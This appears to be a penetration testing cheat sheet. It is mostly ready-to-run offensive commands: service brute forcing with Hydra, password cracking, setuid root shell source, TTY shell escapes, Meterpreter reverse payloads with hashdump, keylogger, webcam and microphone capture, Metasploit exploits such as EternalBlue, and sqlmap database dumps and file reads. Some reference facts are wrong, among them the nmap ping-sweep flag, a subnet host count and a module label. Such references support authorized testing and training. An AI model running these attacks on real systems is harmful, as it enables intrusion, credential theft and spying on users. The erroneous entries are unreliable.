Home

Awesome

Penetration Testing Cheat Sheet 🕵️‍♂️

Welcome to the Penetration Testing Cheat Sheet! This comprehensive guide provides quick references, commands, and techniques for various aspects of penetration testing. Whether you're a beginner or an experienced pentester, this cheat sheet has got you covered.

:mag: Recon and Enumeration

Explore tools and methods for reconnaissance and enumeration to gather valuable information about your target.

:computer: Python Local Web Server

Set up a Python local web server for various purposes, including hosting payloads and files.

:file_folder: Mounting File Shares

Learn how to mount file shares for easy access and interaction.

:point_right: Basic FingerPrinting

Understand basic fingerprinting techniques to gather information about target systems.

:satellite: SNMP Enumeration

Discover SNMP services and gather information using SNMP enumeration.

:globe_with_meridians: DNS Zone Transfers

Perform DNS zone transfers to gather information about DNS records.

:mag_right: DNSRecon

Utilize DNSRecon for efficient DNS information gathering.

:globe_with_meridians: HTTP / HTTPS Webserver Enumeration

Learn how to enumerate information from HTTP/HTTPS webservers.

:traffic_light: Packet Inspection

Inspect network packets and analyze traffic for security assessment.

:busts_in_silhouette: Username Enumeration

Enumerate usernames through SMB and SNMP services.

:key: Passwords

Explore wordlists and resources for password-related tasks.

:shield: Brute Forcing Services

Learn about Hydra and its capabilities for brute forcing various services.

:lock: Password Cracking

Explore password cracking tools and techniques.

:mag_right: Exploit Research

Discover techniques and resources for researching and identifying exploits.

:wrench: Compiling Exploits

Learn how to identify and compile exploits for various systems.

:key: SUID Binary

Understand SUID binaries and their role in privilege escalation.

:shell: TTY Shells

Spawn TTY shells for various programming languages.

:space_invader: Metasploit

Explore Metasploit and its functionalities.

:repeat: Networking

Understand networking concepts for penetration testing.

:globe_with_meridians: IPv4

Learn about IPv4 addressing and subnets.

:1234: ASCII Table Cheat Sheet

Quickly reference ASCII values and characters.

:satellite: Cisco IOS Commands

Explore common Cisco IOS commands for network assessment.


🕵️ Recon and Enumeration

🌐 NMAP Commands

Nmap (“Network Mapper”) is a free and open-source utility for network discovery and security auditing. It's a versatile tool used by both systems and network administrators for tasks like network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.

CommandDescription
nmap -v -sS -A -T4 targetNmap verbose scan, runs syn stealth, T4 timing, OS and service version info, traceroute and scripts against services.
ping sweep sudo nmap -pn targetDoes a ping sweep over the target's network to see all the available IPs.
nmap -v -sS -p–A -T4 targetAs above but scans all TCP ports (takes a lot longer).
nmap -v -sU -sS -p- -A -T4 targetAs above but scans all TCP ports and UDP scan (takes even longer).
nmap -v -p 445 –script=smb-check-vulns --script-args=unsafe=1 192.168.1.XNmap script to scan for vulnerable SMB servers.
nmap localhostDisplays all the ports that are currently in use.
ls /usr/share/nmap/scripts/* | grep ftpSearch nmap scripts for keywords.

📂 SMB Enumeration

In computer networking, Server Message Block (SMB) operates as an application-layer network protocol mainly used for providing shared access to files, printers, and serial ports.

CommandDescription
nbtscan 192.168.1.0/24Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain.
enum4linux -a target-ipDo Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing.
smbclient -L target-ipLists all SMB shares available on the target machine.
smbget -R smb://target-ip/shareRecursively downloads files from an SMB share.
rpcclient -U "" target-ipConnects to an SMB server using an empty username and lists available commands.
showmount -e target-ipShows the available shares on the target machine, useful for NFS.
smbmap -H target-ipShows share permissions of the target.
smbstatusLists current Samba connections. Useful when run on the target machine.

🌐 Other Host Discovery Methods

Other methods of host discovery that don’t use Nmap.

CommandDescription
netdiscover -r 192.168.1.0/24Discovers IP, MAC Address and MAC vendor on the subnet from ARP.
arp-scan --interface=eth0 192.168.1.0/24ARP scan to discover hosts on the local network.
fping -g 192.168.1.0/24Sends ICMP echo requests to multiple hosts to check if they are alive.
masscan -p1-65535,U:1-65535 192.168.1.0/24 --rate=1000Scans all ports at a high rate, useful for initial discovery.

🐍 Python Local Web Server

Python local web server command, handy for serving up shells and exploits on an attacking machine.

CommandDescription
python -m SimpleHTTPServer 80Run a basic HTTP server, great for serving up shells etc.
python3 -m http.server 80Run a basic HTTP server using Python 3.
python -m SimpleHTTPServer 80 --bind 192.168.1.2Bind the server to a specific IP address.

🗄️ Mounting File Shares

How to mount NFS / CIFS, Windows and Linux file shares.

CommandDescription
mount 192.168.1.1:/vol/share /mnt/nfsMount NFS share to /mnt/nfs.
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifsMount Windows CIFS / SMB share on Linux at /mnt/cifs.
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:noMount a Windows share on Windows from the command line.
apt-get install smb4k -yInstall smb4k on Kali, useful Linux GUI for browsing SMB shares.
smbclient -L //192.168.1.X -U usernameList SMB shares available on a Windows machine.

🕵️ Basic FingerPrinting

A device fingerprint or machine fingerprint or browser fingerprint is information collected about a remote computing device for the purpose of identification.

CommandDescription
nc -v 192.168.1.1 25Basic versioning / fingerprinting via displayed banner.
telnet 192.168.1.1 25Another method for basic versioning / fingerprinting.
curl -I http://192.168.1.1Fetch HTTP headers for fingerprinting the web server.
nmap -O 192.168.1.1Perform OS detection using Nmap.
whatweb 192.168.1.1Identify web technologies in use on the target.

📡 SNMP Enumeration

SNMP enumeration is the process of using SNMP to enumerate user accounts on a target system.

CommandDescription
snmpcheck -t 192.168.1.X -c publicSNMP enumeration
snmpwalk -c public -v1 192.168.1.X 1SNMP enumeration
snmpenum -t 192.168.1.XSNMP enumeration
onesixtyone -c names -i hostsSNMP enumeration
snmpbulkwalk -v2c -c public -Cn0 -Cr10 192.168.1.XBulk SNMP enumeration

🌐 DNS Zone Transfers

CommandDescription
nslookup -> set type=any -> ls -d blah.comWindows DNS zone transfer
dig axfr blah.com @ns1.blah.comLinux DNS zone transfer
host -l blah.com ns1.blah.comAnother Linux DNS zone transfer method

📡 DNSRecon

DNSRecon provides the ability to perform various DNS enumeration tasks.

dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml

🌐 HTTP / HTTPS Webserver Enumeration

CommandDescription
nikto -h 192.168.1.1Perform a nikto scan against target
dirbusterConfigure via GUI, CLI input doesn’t work most of the time
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtDirectory brute forcing with gobuster
wpscan --url http://192.168.1.1WordPress vulnerability scanner
joomscan -u http://192.168.1.1Joomla vulnerability scanner
uniscan -u http://192.168.1.1 -qwedsUniscan automated vulnerability scanner
curl -I http://192.168.1.1Fetch HTTP headers using curl
nmap -p80 --script http-enum 192.168.1.1Nmap script for HTTP enumeration
whatweb http://192.168.1.1Identify technologies used on the website
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 http://192.168.1.1/FUZZFuzzing HTTP with wfuzz

📦 Packet Inspection

CommandDescription
tcpdump tcp port 80 -w output.pcap -i eth0Capture packets on port 80
`tcpdump -i eth0 'port 443 and (tcp-syntcp-ack)!=0'`
wireshark -k -i <interface>Open Wireshark on a specific interface
tshark -i eth0 -f "tcp port 80"Capture packets with tshark on port 80

👤 Username Enumeration

SMB User Enumeration

CommandDescription
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXXEnumerate users from SMB
ridenum.py 192.168.XXX.XXX 500 50000 dict.txtRID cycle SMB / enumerate users from SMB
enum4linux -U 192.168.XXX.XXXEnumerate SMB usernames using enum4linux

SNMP User Enumeration

CommandDescription
`snmpwalk public -v1 192.168.X.XXX 1grep 77.1.2.25
python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXXEnumerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txtSearch for SNMP servers with nmap, grepable output

🔒 Passwords

Wordlists

CommandDescription
/usr/share/wordlistsKali word lists
wget https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10-million-password-list-top-1000000.txtDownload a popular wordlist from GitHub

🛠️ Brute Forcing Services

Hydra

FTP Brute Force

CommandDescription
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -VHydra FTP brute force

POP3 Brute Force

CommandDescription
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -VHydra POP3 brute force

SMTP Brute Force

CommandDescription
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -VHydra SMTP brute force

SSH Brute Force

CommandDescription
hydra -l root -P /usr/share/wordlistsnmap.lst 192.168.X.XXX sshHydra SSH brute force

Use -t to limit concurrent connections, example: -t 15

🔐 Password Cracking

John The Ripper – JTR

CommandDescription
john –wordlist=/usr/share/wordlists/rockyou.txt hashesJTR password cracking
john –format=descrypt –wordlist /usr/share/wordlists/rockyou.txt hash.txtJTR forced descrypt cracking with wordlist
john –format=descrypt hash –showJTR forced descrypt brute force cracking

Hashcat

CommandDescription
hashcat -m 0 -a 0 hash.txt wordlist.txtHashcat MD5 cracking
hashcat -m 1000 -a 0 hash.txt wordlist.txtHashcat NTLM cracking

Exploit Research

CommandDescription
`searchsploit windows 2003grep -i local`
site:exploit-db.com exploit kernel <= 3Google search for kernel exploits on exploit-db.com
grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/*Search Metasploit modules for Windows 7 exploits
msfconsole -q -x "search name:windows type:exploit"Search Metasploit for Windows exploits

Compiling Exploits

Identifying if C code is for Windows or Linux

Header FilesOS
process.h, string.h, winbase.h, windows.h, winsock2.hWindows
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.hLinux

Build Exploit GCC

CommandDescription
gcc -o exploit exploit.cBasic GCC compile
gcc -Wall -Wextra exploit.c -o exploitCompile with all warnings and extras

GCC Compile 32Bit Exploit on 64Bit Kali

CommandDescription
gcc -m32 exploit.c -o exploitCross compile 32-bit binary on 64-bit Linux

Compile Windows .exe on Linux

CommandDescription
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exeCompile Windows .exe on Linux
x86_64-w64-mingw32-gcc exploit.c -o exploit.exeCompile 64-bit Windows .exe on Linux

SUID Binary

SUID C Shell for /bin/bash

int main(void){
       setresuid(0, 0, 0);
       system("/bin/bash");
}

SUID C Shell for /bin/sh

int main(void){
       setresuid(0, 0, 0);
       system("/bin/sh");
}

Building the SUID Shell binary

CommandDescription
gcc -o suid suid.cCompile the SUID shell
gcc -m32 -o suid suid.cCompile the 32-bit SUID shell

TTY Shells

Python TTY Shell Trick

python -c 'import pty;pty.spawn("/bin/bash")'

python3 -c 'import pty;pty.spawn("/bin/bash")'

Spawn Interactive sh shell

/bin/sh -i

Spawn Perl TTY Shell

perl -e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

ruby -e 'exec "/bin/sh"'

Spawn Lua TTY Shell

lua -e 'os.execute("/bin/sh")'

Spawn TTY Shell from Vi

:!bash

Spawn TTY Shell from NMAP

!sh

Spawn TTY Shell from awk

awk 'BEGIN {system("/bin/sh")}'

Spawn TTY Shell from socat

socat file:tty,raw,echo=0 tcp-listen:4444

Metasploit

Meterpreter Payloads

Windows reverse meterpreter payload

set payload windows/meterpreter/reverse_tcp

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcp

set ViewOnly false

Linux Reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcp

Android Reverse Meterpreter payload

set payload android/meterpreter/reverse_tcp

Meterpreter Cheat Sheet

CommandDescription
upload file c:\\windowsUpload file to Windows target
download c:\\windows\\repair\\sam /tmpDownload file from Windows target
execute -f c:\\windows\temp\exploit.exeRun .exe on target
execute -f cmd -cCreates new channel with cmd shell
psShow processes
shellGet shell on the target
getsystemAttempts privilege escalation on the target
hashdumpDump the hashes on the target
portfwd add –l 3389 –p 3389 –r targetCreate port forward to target machine
portfwd delete –l 3389 –p 3389 –r targetDelete port forward
screenshotCapture screenshot of the target machine
keyscan_startStart keylogger
keyscan_dumpDump collected keystrokes
webcam_snapTake webcam snapshot
record_micRecord microphone
enum_chromeEnumerate Chrome browser data

:computer: Common Metasploit Modules

:closed_lock_with_key: Remote Windows Metasploit Modules (exploits)

CommandDescription
use exploit/windows/smb/ms08_067_netapiMS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapiMS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ms09_050_smb2_negotiate_func_indexMS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit
use exploit/windows/smb/ms17_010_eternalblueMS17_010 EternalBlue SMB Remote Windows Kernel Pool Corruption

:key: Local Windows Metasploit Modules (exploits)

CommandDescription
use exploit/windows/local/bypassuacBypass UAC on Windows 7 + Set target + arch, x86/64
use exploit/windows/local/ms10_015_kitrap0dMS10_015 Kitrap0d Local Privilege Escalation

:mag: Auxilary Metasploit Modules

CommandDescription
use auxiliary/scanner/http/dir_scannerMetasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscanMetasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_loginMetasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_versionMetasploit MySQL Version Scanner
use auxiliary/scanner/oracle/oracle_loginMetasploit Oracle Login Module

:shell: Metasploit Powershell Modules

CommandDescription
use exploit/multi/script/web_deliveryMetasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershellMetasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployerMetasploit JBOSS deploy
use exploit/windows/mssql/mssql_payloadMetasploit MSSQL payload

:wrench: Post Exploit Windows Metasploit Modules

CommandDescription
run post/windows/gather/win_privsMetasploit show privileges of current user
use post/windows/gather/credentials/gppMetasploit grab GPP saved passwords
load mimikatz -> wdigestMetasploit load Mimikatz
run post/windows/gather/local_admin_search_enumIdentify other machines that the supplied domain user has administrative access to

:satellite: Networking

:signal_strength: TTL Fingerprinting

Operating SystemTTL Size
Windows128
Linux64
Solaris255
Cisco / Network255

IPv4 :earth_americas:

Classful IP Ranges :chart_with_upwards_trend:

Note: Class A, B, C are deprecated

ClassIP Address Range
Class A :one:0.0.0.0 – 127.255.255.255
Class B :two:128.0.0.0 – 191.255.255.255
Class C :three:192.0.0.0 – 223.255.255.255
Class D :four:224.0.0.0 – 239.255.255.255
Class E :five:240.0.0.0 – 255.255.255.255

IPv4 Private Address Ranges :lock:

ClassRange
Class A :one:10.0.0.0 – 10.255.255.255
Class B :two:172.16.0.0 – 172.31.255.255
Class C :three:192.168.0.0 – 192.168.255.255
Loopback :repeat:127.0.0.0 – 127.255.255.255

IPv4 Subnet Cheat Sheet :memo:

CIDRDecimal MaskNumber of Hosts
/31255.255.255.2541 Host
/30255.255.255.2522 Hosts
/29255.255.255.2486 Hosts
/28255.255.255.24014 Hosts
/27255.255.255.22430 Hosts
/26255.255.255.19262 Hosts
/25255.255.255.128126 Hosts
/24255.255.255.0254 Hosts
/23255.255.254.0512 Hosts
/22255.255.252.01022 Hosts
/21255.255.248.02046 Hosts
/20255.255.240.04094 Hosts
/19255.255.224.08190 Hosts
/18255.255.192.016382 Hosts
/17255.255.128.032766 Hosts
/16255.255.0.065534 Hosts
/15255.254.0.0131070 Hosts
/14255.252.0.0262142 Hosts
/13255.248.0.0524286 Hosts
/12255.240.0.01048674 Hosts
/11255.224.0.02097150 Hosts
/10255.192.0.04194302 Hosts
/9255.128.0.08388606 Hosts
/8255.0.0.016777214 Hosts

ASCII Table Cheat Sheet :keyboard:

Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.

ASCIICharacterASCIICharacterASCIICharacterASCIICharacter
x00Null Bytex08BSx09TABx0aLF
x0dCRx1bESCx20SPCx21!
x22"x23#x24$x25%
x26&x27`x28(x29)
x2a*x2b+x2c,x2d-
x2e.x2f/x300x311
x322x333x344x355
x366x377x388x399
x3a:x3b;x3c<x3d=
x3e>x3f?x40@x41A
x42Bx43Cx44Dx45E
x46Fx47Gx48Hx49I
x4aJx4bKx4cLx4dM
x4eNx4fOx50Px51Q
x52Rx53Sx54Tx55U
x56Vx57Wx58Xx59Y
x5aZx5b[x5c\x5d]
x5e^x5f_x60`x61a
x62bx63cx64dx65e
x66fx67gx68hx69i
x6ajx6bkx6clx6dm
x6enx6fox70px71q
x72rx73sx74tx75u
x76vx77wx78xx79y
x7az

Cisco IOS Commands :computer:

CommandDescription
enableEnters enable mode
conf tShort for, configure terminal
(config)# interface fa0/0Configure FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255Add IP to fa0/0
(config-if)# line vty 0 4Configure vty line
(config-line)# loginCisco set telnet password
(config-line)# password YOUR-PASSWORDSet telnet password
# show running-configShow running config loaded in memory
# show startup-configShow startup config
# show versionShow Cisco IOS version
# show sessionDisplay open sessions
# show ip interfaceShow network interfaces
# show interface e0Show detailed interface info
# show ip routeShow routes
# show access-listsShow access lists
# dir file systemsShow available files
# dir all-filesystemsFile information
# dir /allShow deleted files
# terminal length 0No limit on terminal output
# copy running-config tftpCopies running config to tftp server
# copy running-config startup-configCopy startup-config to running-config

Cryptography :lock:

Hash Lengths

HashSize
MD516 Bytes
SHA-120 Bytes
SHA-25632 Bytes
SHA-51264 Bytes

Hash Examples

HashExample
MD5 Hash Example8743b52063cd84097a65d1633f5c74f5
SHA1 Hash Exampleb89eaac7e61417341b710b727768294d0e6a277b
SHA-256127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935
SHA-51282a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f

SQLMap Examples :bug:

CommandDescription
sqlmap -u http://meh.com –forms –batch –crawl=10 –cookie=jsessionid=54321 –level=5 –risk=3Automated sqlmap scan
sqlmap -u TARGET -p PARAM –data=POSTDATA –cookie=COOKIE –level=3 –current-user –current-db –passwords –file-read="/var/www/blah.php"Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" –dbms=mysql –tech=U –random-agent –dumpScan URL for union + error-based injection with MySQL backend and use a random user agent + database dump
sqlmap -o -u "http://meh.com/form/" –formsSQLMap check form for injection
sqlmap -o -u "http://meh/vuln-form" –forms -D database-name -T users –dumpSQLMap dump and crack hashes for table users on database-name